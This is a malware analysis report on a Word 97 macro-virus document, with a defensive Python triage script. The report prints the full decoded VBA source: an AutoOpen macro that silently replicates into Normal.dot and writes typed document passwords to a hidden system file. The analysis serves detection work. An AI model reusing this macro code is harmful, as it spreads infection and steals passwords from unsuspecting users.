Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6246cabfbe2c88aa…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 30.5 KB
Created: 1998-01-01 00:54:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 529c8c245454a5af518bd660c0e3a39e
SHA-1: 46ab96c9385b7641233bd5d23db6383a0e5cc919
SHA-256: 6246cabfbe2c88aa5fbbfa111291714bd57b69f6112ac6c9a8c3feb254f8dd15
Risk score: 80

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample is an OLE (Word 97-2003) document whose VBA project holds a module named "fake®" with an AutoOpen subroutine, so the macro runs as soon as the document is opened with macros enabled. It first suppresses screen updates and alerts and calls WordBasic.DisableAutoMacros 0 (an argument of 0 turns automatic macros back on). It then checks whether a component named "fake®" is present in the active document and in the Normal template, and uses Application.OrganizerCopy to copy the "fake®" and "PassBox" project items in whichever direction is missing: into Normal.dot when the global template is clean (with Options.SaveNormalPrompt = False so the infected template is saved silently), or back into the document, which is then resaved in template format, when the document is clean. This is the classic self-replication pattern of Word 97 macro viruses. If the opened document is password-protected, the macro shows the PassBox UserForm and the Abre function appends the document path and whatever was typed into the form (presumably the document password) to C:\IO.SDX, then marks that file read-only, hidden and system (SetAttr 1 + 2 + 4). Only the appended p-code listing is truncated; the recovered source is complete enough to establish both replication into the global template and harvesting of document passwords to a concealed local file.

Heuristics (3)

  • VBA macros detected [medium] OLE_VBA_MACROS (1 related finding)
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
    Note: for this sample a VBA project was in fact recovered (see macros.bas under Extracted artifacts), so this marker corroborates OLE_VBA_AUTOOPEN rather than adding independent evidence.
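The replication-and-harvest behaviour summarised above, as an added triage script that is not part of the analyzer or of the sample: it scans decoded VBA source (the kind of output olevba produces) for the behaviours the heuristics point at rather than for the mere presence of VBA, and decodes the SetAttr mask so the analyst sees which attribute bits conceal the dropped file. The SAMPLE_VBA excerpt is constructed from the carved macro for illustration and is not the artifact itself; the indicator names, regexes and verdict logic are assumptions of this example, not the analyzer's rule set.

```python
import re

# Constructed excerpt modelled on the carved macros.bas (trimmed; not the artifact itself).
SAMPLE_VBA = r'''
Sub AutoOpen()
On Error GoTo Final
   WordBasic.DisableAutoMacros 0
   Options.VirusProtection = True
   If GlobalInstalled = False Then
      Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="fake", Object:=wdOrganizerObjectProjectItems
      Options.SaveNormalPrompt = False
   End If
   If ActiveDocument.HasPassword = False Then GoTo Final
   PassBox.Show
   Call Abre
Final:
End Sub

Function Abre()
On Error Resume Next
SetAttr "C:\IO.SDX", 0
Open "C:\IO.SDX" For Append As #1
Print #1, "Password = " + PassBox.TextBox1
Close #1
SetAttr "C:\IO.SDX", 1 + 2 + 4
End Function
'''

# Word auto-execution entry points: legacy WordBasic names plus the VBA document events.
AUTO_EXEC = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?Sub\s+"
    r"(AutoOpen|AutoExec|AutoNew|AutoClose|AutoExit|Document_Open|Document_New|Document_Close)\b",
    re.I | re.M)

# Behavioural indicators (hypothetical names): each describes what the code does,
# which is more than a "VBA present" heuristic tells you.
INDICATORS = [
    ("auto_exec_entrypoint", AUTO_EXEC),
    ("normal_template_replication",
     re.compile(r"OrganizerCopy[^\n]*Destination:=NormalTemplate\.FullName", re.I)),
    ("macro_security_tampering",
     re.compile(r"\bDisableAutoMacros\b|\bVirusProtection\b|\bSaveNormalPrompt\b", re.I)),
    ("userform_input_to_file",
     re.compile(r"Print\s+#\d+\s*,[^\n]*\.TextBox\d+", re.I)),
]

# SetAttr "<path>", <literal mask>; the mask is a sum of integer literals in this sample.
SETATTR = re.compile(r'SetAttr\s+"([^"]+)"\s*,\s*([0-9+ ]+)', re.I)

# VBA file-attribute constants: vbReadOnly=1, vbHidden=2, vbSystem=4, vbArchive=32.
ATTR_BITS = {1: "ReadOnly", 2: "Hidden", 4: "System", 32: "Archive"}


def decode_setattr(mask_expr: str) -> list:
    """Evaluate a literal sum such as '1 + 2 + 4' and name the attribute bits it sets."""
    value = sum(int(tok) for tok in mask_expr.replace(" ", "").split("+") if tok)
    return [name for bit, name in ATTR_BITS.items() if value & bit]


def triage(vba_source: str) -> dict:
    """Map indicator names to the first piece of evidence found in the VBA source."""
    findings = {}
    for name, rx in INDICATORS:
        m = rx.search(vba_source)
        if m:
            findings[name] = m.group(0).strip()
    # A mask with Hidden or System conceals the dropped file from a default directory
    # listing; a mask of 0 is only the attribute reset that precedes the write.
    for path, mask in SETATTR.findall(vba_source):
        bits = decode_setattr(mask)
        if "Hidden" in bits or "System" in bits:
            findings["hidden_dropped_file"] = path + " -> " + "|".join(bits)
    return findings


def verdict(findings: dict) -> str:
    """Auto-exec combined with replication or harvesting is what justifies MALICIOUS."""
    if "auto_exec_entrypoint" in findings and (
            "normal_template_replication" in findings
            or "userform_input_to_file" in findings):
        return "MALICIOUS"
    return "SUSPICIOUS" if findings else "CLEAN"


if __name__ == "__main__":
    found = triage(SAMPLE_VBA)
    for key, evidence in found.items():
        print(f"{key:30s} {evidence}")
    print("verdict:", verdict(found))
```

Running it against real olevba output is a matter of passing the decoded source string to triage(); the point of keying on OrganizerCopy into NormalTemplate and on Print of a UserForm field is that those survive renaming of the module (here "fake®") and of the form, whereas a string match on the module name would not.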

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7786 bytes
SHA-256: 90883139a3de1c33f92acdb4969d3f0fb4b670aaf56ec6291ecec482f49d6450

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "fake®"
Sub AutoOpen()
' Macro criada por Daniel !!!
On Error GoTo Final

   Application.ScreenUpdating = False
   Application.DisplayAlerts = wdAlertsNone

   WordBasic.DisableAutoMacros 0
   Options.VirusProtection = True


   Set ActiveDoc = ActiveDocument
   Set GlobalDoc = NormalTemplate

   DocumentInstalled = False
   GlobalInstalled = False
   
  For I = 1 To ActiveDocument.VBProject.VBComponents.Count
      If ActiveDocument.VBProject.VBComponents(I).Name = "fake®" Then
         DocumentInstalled = True
      End If
   Next

   For J = 1 To NormalTemplate.VBProject.VBComponents.Count
      If NormalTemplate.VBProject.VBComponents(J).Name = "fake®" Then
        GlobalInstalled = True
      End If
   Next
   
      If DocumentInstalled = False Then
         Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="fake®", Object:=wdOrganizerObjectProjectItems
          ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate
            Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="PassBox", Object:=wdOrganizerObjectProjectItems
              ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate
      End If
           
     
      If GlobalInstalled = False Then
         Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="fake®", Object:=wdOrganizerObjectProjectItems
         Options.SaveNormalPrompt = False
            Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="PassBox", Object:=wdOrganizerObjectProjectItems
            Options.SaveNormalPrompt = False
      End If
        If ActiveDocument.HasPassword = False Then GoTo Final
     PassBox.Show
     Call Abre
Final:
    End Sub
    
Function Abre()
  
On Error Resume Next
SetAttr "C:\IO.SDX", 0
Open "C:\IO.SDX" For Append As #1
Print #1, "Path = " + ActiveDocument.FullName
Print #1, "Password = " + PassBox.TextBox1
Print #1, " "
Close #1
SetAttr "C:\IO.SDX", 1 + 2 + 4

Application.DisplayAlerts = wdAlertsAll
Unload PassBox

End Function

Attribute VB_Name = "NewMacros"

' Processing file: /opt/analyzer/scan_staging/49b5367e64e8498ebc7facb82a0d40cb.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1117 bytes
' Macros/VBA/fake® - 3481 bytes
' Line #0:
' 	FuncDefn (Sub AutoOpen())
' Line #1:
' 	QuoteRem 0x0000 0x001C " Macro criada por Daniel !!!"
' Line #2:
' 	OnError Final 
' Line #3:
' Line #4:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #5:
' 	Ld wdAlertsNone 
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #6:
' Line #7:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #8:
' 	LitVarSpecial (True)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #9:
' Line #10:
' Line #11:
' 	SetStmt 
' 	Ld ActiveDocument 
' 	Set ActiveDoc 
' Line #12:
' 	SetStmt 
' 	Ld NormalTemplate 
' 	Set GlobalDoc 
' Line #13:
' Line #14:
' 	LitVarSpecial (False)
' 	St DocumentInstalled 
' Line #15:
' 	LitVarSpecial (False)
' 	St GlobalInstalled 
' Line #16:
' Line #17:
' 	StartForVariable 
' 	Ld I 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	For 
' Line #18:
' 	Ld I 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	LitStr 0x0005 "fake®"
' 	Eq 
' 	IfBlock 
' Line #19:
' 	LitVarSpecial (True)
' 	St DocumentInstalled 
' Line #20:
' 	EndIfBlock 
' Line #21:
' 	StartForVariable 
' 	Next 
' Line #22:
' Line #23:
' 	StartForVariable 
' 	Ld
... (truncated)